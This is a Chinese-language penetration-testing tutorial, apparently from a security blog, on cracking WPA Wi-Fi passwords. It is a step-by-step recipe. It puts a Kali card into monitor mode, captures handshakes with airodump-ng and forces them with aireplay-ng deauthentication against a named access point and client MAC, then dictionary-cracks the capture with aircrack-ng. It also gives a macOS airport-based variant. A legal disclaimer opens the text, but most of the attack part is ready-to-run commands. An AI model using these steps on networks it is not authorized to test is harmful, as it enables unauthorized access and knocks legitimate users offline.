烏鴉安全的技術文章僅供參考,此文所提供的資訊隻為網絡安全人員對自己所負責的網站、伺服器等(包括但不限于)進行檢測或維護參考,未經授權請勿利用文章中的技術資料對任何計算機系統進行入侵操作。利用此文所提供的資訊而造成的直接或間接後果和損失,均由使用者本人負責。
烏鴉安全擁有對此文章的修改、删除和解釋權限,如轉載或傳播此文章,需保證文章的完整性,未經授權,不得用于其他。
聲明
本文隻是提供一個思路,目的是為了提升學習滲透的興趣,禁止用于非法操作,否則後果自負 !!!
當然現在已經2021年了,誰還破WiFi,但是為了近源滲透,是以在這又來老生常談了一次,這裡使用了Kali和外置網卡以及mac破解Wi-Fi的方法。
視訊教程連結位址:
https://space.bilibili.com/29903122
複制
01 外置網卡版
1.準備工作
首先你得有一個外置網卡,然後用虛拟機進行破解
所需要的裝置:kali linux 外置網卡
要将虛拟機設定為:橋接模式

将插入的外接網卡設定為:
ifconfig看下:
2.開始攻擊
将wlan0網卡開啟混雜模式
airmon-ng start wlan0
#提示要殺掉一些程序,根據提示進行即可
airmon-ng check kill
airmon-ng start wlan0
複制
開始抓包:
首先,檢視附近WiFi熱點,使用指令
airodump-ng wlan0mon
複制
選取其中信号較好的WiFi熱點,在這裡我們選取一個目标(A4-306 2.4G)
使用airodump-ng對選取的WiFi熱點進行cap監聽與擷取:
airodump-ng -c 6 --bssid 88:25:93:60:C0:D9 -w A4-3062.4G wlan0mon(儲存檔案名稱)
-c 通道值 WiFi熱點所對應的CH值(上圖中可看到)
--bssid 需要破解WiFi的MAC值
-w cap檔案名 wlan0mon 啟用混雜模式的網卡名
複制
這個時候看到有12個裝置進行了連接配接,選取一個為75-D7的進行抓包:(需要一直開啟)
使用aireplay-ng 對選取的WiFi熱點進行cap監聽與擷取:(再啟動一個指令行)
aireplay-ng -0 2 -c E8:4E:06:21:75:D7 -a 88:25:93:60:C0:D9 wlanmon
-0 death模式
2為發送次數
-c 你所選擇要斷網操作的客戶機MAC
-a WiFi熱點MAC
複制
有時候一次抓不到,多試幾次,我試了三次之後,抓到了:
這個時候監聽就可以停止了。
3. 跑包
我們直接使用kali自帶的,在檔案目錄中,需要解壓(這裡不做示範)
#首先ls檢視目前目錄所産生的握手包 aircrack-ng -w rockyou.txt A4-3062.4G-02.cap
-w代表字典 接着你的包名稱
複制
然後就等結果吧!(其實如果wifi密碼複雜的話,基本上很難跑出來)
這個隻是一個筆記,現在暴力破解的太難了,wifi密碼稍微一複雜,基本就無望。
4. 2019年11月更新
現在使用kali自帶的aircrack好像已經過時了,我在網上看到有更好、能跑GPU的工具了,具體的名字忘了,大家可以自行搜尋,另外很多人再問我的無線網卡的型号,我的記得就30左右,不用買太好的,一般的就行:
最重要的還是字典問題,當然還有一種破解的方法是對pin包檢測,但是那種方法隻适合更老的路由器裝置,現在的路由器基本上都可以防pin了,是以在這裡就不再示範了。
02 macos版本方案
mac自帶了airport工具
2.1 使用ariport
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport
複制
2.2 發現附近Wi-Fi
airport -s
複制
2.3 偵聽資料
airport en0 sniff 1 # 1代表信道
複制
此時Wi-Fi圖示發現改變
一段時間後手動結束偵聽,這裡是為了抓到握手包
2.4 分析流量
aircrack-ng airportSniffkZzYWr.cap
複制
其中可以看到 4-401已經抓到了握手包
2.5 aircrack破解
aircrack-ng -w dict.txt -b c0:61:18:11:d9:dc /tmp/airportSniffLbhZSp.cap
複制
參考連結:https://blog.csdn.net/qq_39498701/article/details/104262468
複制
tips:加我wx,拉你入群,一起學習